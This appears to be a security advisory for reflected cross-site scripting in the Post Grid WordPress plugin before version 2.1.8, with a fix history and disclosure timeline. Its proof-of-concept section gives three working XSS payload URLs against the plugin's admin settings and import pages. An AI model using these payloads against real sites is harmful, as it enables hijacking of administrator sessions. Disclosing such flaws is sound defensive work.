Post Grid < 2.1.8 - Reflected Cross-Site Scripting (XSS)
Description
The slider import search feature and tab parameter of the plugin settings are not properly sanitised before being output back in the pages, leading to Reflected Cross-Site Scripting issues
Proof of Concept
https://example.com/wp-admin/edit.php?post_type=post_grid&page=post-grid-settings&tab="><script>alert(1)</script> https://example.com/wp-admin/edit.php?post_type=post_grid&page=import_layouts&keyword="onmouseover=alert(1)// v 2.1.4 partially fixed the issue, still allowing arbitrary attributes to be injected, ie https://example.com/wp-admin/edit.php?post_type=post_grid&page=post-grid-settings&tab="+accesskey=X+onclick=alert(1)// v2.1.5 removed a lot of escaping done in 2.1.4, and was put back in v2.1.8
Affects Plugins
Fixed in version 2.1.8✓
References
Classification
Miscellaneous
Original Researcher
0xB9
Submitter twitter
Verified
Yes
Timeline
Publicly Published
2021-06-28 (about 7 months ago)
Added
2021-06-28 (about 7 months ago)
Last Updated
2022-01-02 (about 22 days ago)